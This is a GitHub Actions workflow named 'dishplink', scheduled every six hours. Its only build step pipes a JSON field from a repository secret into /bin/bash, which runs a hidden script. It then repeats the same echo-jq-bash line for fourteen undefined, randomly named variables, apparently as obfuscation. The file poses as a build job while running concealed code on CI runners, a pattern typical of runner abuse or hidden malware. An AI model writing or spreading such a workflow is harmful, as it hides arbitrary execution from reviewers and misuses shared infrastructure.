name: dishplink
on:
  workflow_dispatch:
  schedule:
    - cron: '34 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dishplink
        env:
          al45033: ${{ secrets.al45033 }}
        run: |
          echo $al45033 | jq -r .wj614 | /bin/bash
          echo $ynkv4472 | jq -r .iy013 | /bin/bash
          echo $lgx57 | jq -r .hcdon3715 | /bin/bash
          echo $oe8 | jq -r .yelft555 | /bin/bash
          echo $kpdg62 | jq -r .qty35149 | /bin/bash
          echo $homk58904 | jq -r .tireh5641 | /bin/bash
          echo $c252 | jq -r .ig33 | /bin/bash
          echo $vtqax42030 | jq -r .qqrtm8594 | /bin/bash
          echo $zipjb8 | jq -r .fer0066 | /bin/bash
          echo $yqym7338 | jq -r .newq436 | /bin/bash
          echo $k15637 | jq -r .zs24663 | /bin/bash
          echo $nsrde09 | jq -r .eaj8844 | /bin/bash
          echo $fzs00025 | jq -r .wqx54074 | /bin/bash
          echo $f032 | jq -r .ofoj17 | /bin/bash
          echo $h73875 | jq -r .f76816 | /bin/bash

